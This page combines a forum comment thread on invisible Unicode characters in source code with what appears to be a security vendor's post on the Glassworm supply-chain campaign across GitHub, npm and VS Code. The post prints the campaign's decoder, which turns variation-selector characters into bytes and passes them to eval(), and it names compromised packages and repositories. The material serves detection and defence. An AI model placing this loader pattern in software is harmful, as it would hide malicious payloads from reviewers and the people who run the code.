The article is about in JavaScript, although it can apply to other programming languages as well. However, even in JavaScript, you can use \u escapes in place of the non-ASCII characters. (One of my ideas in a programming language design intended to be better instead of C, is that it forces visible ASCII (and a few control characters, with some restrictions on their use), unless you specify by a directive or switch that you want to allow non-ASCII bytes.)
The mere fact that a software maintainer would merge code without knowing what it does says more about the terrible state of software.
Sure the payload is invisible (although tbh im surprised it is. PUA characters usually show up as boxes with hexcodes for me), but the part where you put an "empty" string through eval isn't.
If you are not reviewing your code enough to notice something as non sensical as eval() an empty string, would you really notice the non obfuscated payload either?
Is there ever a circumstance where the invisible characters are both legitimate and you as a software developer wouldn't want to see them in the source code?
For data or code hiding the Acme::Bleach Perl module is an old example though by no means the oldest example of such. This is largely irrelevant given how relevant not learning from history is for most.
Invisible characters may also cause hard to debug issues, such as lpr(1) not working for a user, who turned out to have a control character hiding in their .cshrc. Such things as hex viewers and OCD levels of attention to detail are suggested.
Sure, third-party services like the OP can provide bots that can scan. But if you create an ecosystem in which PRs can be submitted by threat actors, part of your commitment to the community should be to provide visibility into attacks that cannot be seen by the naked eye, and make that protection the norm rather than the exception.
[0] https://docs.github.com/en/get-started/learning-about-github...
Innocuous PR (but do note the line about "pedronauck pushed a commit that referenced this pull request last week"): https://github.com/pedronauck/reworm/pull/28
Original commit: https://github.com/pedronauck/reworm/commit/df8c18
Amended commit: https://github.com/pedronauck/reworm/commit/d50cd8
Either way, pretty clear sign that the owner's creds (and possibly an entire machine) are compromised.
I am wondering how that they've LLM, are people using them for making new kind of malicious codes more sophisticated than before?
Things that vanish on a printout should not be in Unicode.
Remove them from Unicode.
My clawbot & other AI agents already have this figured out.
/s
Are people using eval() in production code?
I should be able to use Ü as a cursed smiley in text, and many more writing systems supported by Unicode support even more funny things. That's a good thing.
On the other hand, if technical and display file names (to GUI users) were separate, my need for crazy characters in file names, code bases and such are very limited. Lower ASCII for actual file names consumed by technical people is sufficient to me.
Do you honestly think this is a workable solution?
But really, it still has to be injected after the fact. Even the most superficial code review should catch it.
Then, any appearance of unprintable characters should also be flagged. There are rather few legitimate uses of some zero-width characters, like ZWJ in emoji composition. Ideally all such characters should be inserted as \xNNNN escape sequences, and not literal characters.
Simple lint rules would suffice for that, with zero AI involvement.
Unicode needs tab, space, form feed, and carriage return.
Unicode needs U+200E LEFT-TO-RIGHT MARK and U+200F RIGHT-TO-LEFT MARK to switch between left-to-right and right-to-left languages.
Unicode needs U+115F HANGUL CHOSEONG FILLER and U+1160 HANGUL JUNGSEONG FILLER to typeset Korean.
Unicode needs U+200C ZERO WIDTH NON-JOINER to encode that two characters should not be connected by a ligature.
Unicode needs U+200B ZERO WIDTH SPACE to indicate a word break opportunity without actually inserting a visible space.
Unicode needs MONGOLIAN FREE VARIATION SELECTORs to encode the traditional Mongolian alphabet.
Also this attack doesnt seem to use invisible characters just characters that dont have an assigned meaning.
Rule of thumb: two Unicode sequences that look identical when printed should consist of the same code points.
It makes the product better
I know people love to talk money and costs and "value", but HN is a space for developers, not the business people. Our primary concern, as developers, is to make the product better. The business people need us to make the product better, keep the company growing, and beat out the competition. We need them to keep us from fixating on things that are useful but low priority and ensuring we keep having money. The contention between us is good, it keeps balance. It even ensures things keep getting better even if an effective monopoly forms as they still need us, the developers, to make the company continue growing (look at monopolies people aren't angry at and how they're different). And they need us more than we need them.So I'd argue it's the responsibility of the developers, hired by GitHub, to create this feature because it makes the product better. Because that's the thing you've been hired for: to make the product better. Your concern isn't about the money, your concern is about the product. That's what you're hired for.
Yes, it's a red flag. Yes, there's legitimate uses. Yes, you should always interrogate evals more closely. All these are true
grep -P '[\x{200B}\x{200C}\x{200D}\x{FEFF}]' code.ts
See https://stackoverflow.com/q/78129129/223424I have considered allowing a short list that does not include emojis, joining characters, and so on - basically just currency symbols, accent marks, and everything else you'd find in CP-1521 but never got around to it.
Emojis are another abomination that should be removed from Unicode. If you want pictures, use a gif.
Those are legacied in with ASCII. And only space and newline are needed. Before I check in code to git, I run a program that removes the tabs and linefeeds.
> Unicode needs U+200E LEFT-TO-RIGHT MARK and U+200F RIGHT-TO-LEFT MARK to switch between left-to-right and right-to-left languages.
!!tfel ot thgir ,am ,kooL
> Unicode needs U+115F HANGUL CHOSEONG FILLER and U+1160 HANGUL JUNGSEONG FILLER to typeset Korean.
I don't believe it.
> Unicode needs U+200C ZERO WIDTH NON-JOINER to encode that two characters should not be connected by a ligature.
Not needed.
> Unicode needs U+200B ZERO WIDTH SPACE to indicate a word break opportunity without actually inserting a visible space.
How on earth did people read printed matter without that?
> Unicode needs MONGOLIAN FREE VARIATION SELECTORs to encode the traditional Mongolian alphabet.
Somehow people didn't need invisible characters when printing books.
And, for example, Greek words containing this letter should be encoded with a mix of Latin and Greek characters?
There are also languages that are written from to to bottom.
Unicode is not exclusively for coding, to the contrary, pretty sure it's only a small fraction of how Unicode is used.
> Somehow people didn't need invisible characters when printing books.
They didn't need computers either so "was seemingly not needed in the past" is not a good argument.
Look Ma
xt! N !
e tee S
T larip
(No Unicode needed.)While at it we could also unify I, | and l. It's too confusing sometimes.
Yes. Unicode should not be about semantic meaning, it should be about the visual. Like text in a book.
> And, for example, Greek words containing this letter should be encoded with a mix of Latin and Greek characters?
Yup. Consider a printed book. How can you tell if a letter is a Greek letter or a Latin letter?
Those Unicode homonyms are a solution looking for a problem.
And when the incremental cost to build a feature is low in an age of agentic AI, there should be no barrier to a member of the technical staff (and hopefully they're not divided into devs/test/PM like in decades past) putting a prototype together for this.
Eval for json also lead to other security issues like XSSI.
Do you think 1, l and I should be encoded as the same character, or does this logic only extend to characters pesky foreigners use.
I can absolutely tell Cyrillic k from the lating к and latin u from the Cyrillic и.
>should not be about semantic meaning,
It's always better to be able to preserve more information in a text and not less.
But I also think we've had a culture shift that's hurting our field. Where engineers are arguing about if we should implement certain features based on the monetary value (which are all fictional anyways). But that's not our job. At best, it's the job of the engineering manager to convince the business people that it has not only utility value, but monetary.
I would say they are arguing that in bad faith, so I wanted to enter a dialogue where they are either forced to agree, or more likely, not respond at all.
The invisible threat we've been tracking for nearly a year is back. While the PolinRider campaign has been making headlines for compromising hundreds of GitHub repositories, we are separately seeing a new wave of Glassworm activity hitting GitHub, npm, and VS Code.
In October last year, we wrote about how hidden Unicode characters were being used to compromise GitHub repositories, tracing the technique back to a threat actor named Glassworm. This month, the same actor is back, and among the affected repositories are some notable names: a repo from Wasmer, Reworm, and opencode-bench from anomalyco, the organization behind OpenCode and SST.
Before diving into the scale of this new wave, let’s recap how this attack works. Even after months of coverage, it continues to catch developers and tooling off guard.
The trick relies on invisible Unicode characters: code snippets that are rendered as nothing in virtually every editor, terminal, and code review interface. Attackers use these invisible characters to encode a payload directly inside what appears to be an empty string. When the JavaScript runtime encounters it, a small decoder extracts the real bytes and passes them to eval().
Here's what the injection looks like. Remember, the apparent gap in the empty backticks below is anything but empty:
const s = v => [...v].map(w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
)).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));
The backtick string passed to s() looks empty in every viewer, but it's packed with invisible characters that, once decoded, produce a full malicious payload. In past incidents, that decoded payload fetched and executed a second-stage script using Solana as a delivery channel, capable of stealing tokens, credentials, and secrets.
We are observing a mass campaign by the Glassworm threat actor spreading across open source repositories. A GitHub code search for the decoder pattern currently returns at least 151 matching repositories, and that number understates the true scope, since many affected repositories have already been deleted by the time of writing. The GitHub compromises appear to have taken place between March 3 and March 9.

The campaign has also expanded beyond GitHub. We are now seeing the same technique deployed in npm and the VS Code marketplace, suggesting Glassworm is operating a coordinated, multi-ecosystem push. This is consistent with the group's historical pattern of pivoting between registries.
| Package | Ecosystem | Versions | Date |
|---|---|---|---|
@aifabrix/miso-client |
npm | 4.7.2 | Mar 12, 2026 |
@iflow-mcp/watercrawl-watercrawl-mcp |
npm | 1.3.0, 1.3.1, 1.3.2, 1.3.3, 1.3.4 | Mar 12, 2026 |
quartz.quartz-markdown-editor |
VS Code | 0.3.0 | Mar 12, 2026 |
Among the repositories we identified, several belong to well-known projects with meaningful star counts, making them high-value targets for downstream supply chain impact:
| Repository | Stars |
|---|---|
| pedronauck/reworm | 1,460 |
| pedronauck/spacefold | 62 |
| anomalyco/opencode-bench | 56 |
| doczjs/docz-plugin-css | 39 |
| uknfire/theGreatFilter | 38 |
| sillyva/rpg-schedule | 37 |
| wasmer-examples/hono-wasmer-starter | 8 |
As we noted in our October article, the malicious injections don't arrive in obviously suspicious commits. The surrounding changes are realistic: documentation tweaks, version bumps, small refactors, and bug fixes that are stylistically consistent with each target project.
This level of project-specific tailoring strongly suggests the attackers are using large language models to generate convincing cover commits. At the scale we're now seeing, manual crafting of 151+ bespoke code changes across different codebases simply isn't feasible.
Invisible threats require active defenses. You cannot rely on visual code review or standard linting to catch what you cannot see. At Aikido, we've built detection for invisible Unicode injection directly into our malware scanning pipeline.
If you already use Aikido, these packages would be flagged in your feed as a 100/100 critical finding.

Not on Aikido yet? Create a free account and link your repositories. The free plan includes our malware detection coverage (no credit card required).
Finally, a tool that can stop supply-chain malware in real time as they appear can prevent a serious infection. This is the idea behind Aikido Safe Chain, a free and open-source tool that wraps around npm, npx, yarn, pnpm, and pnpx and uses both AI and human malware researchers to detect and block the latest supply chain risks before they enter your environment.
{{cta}}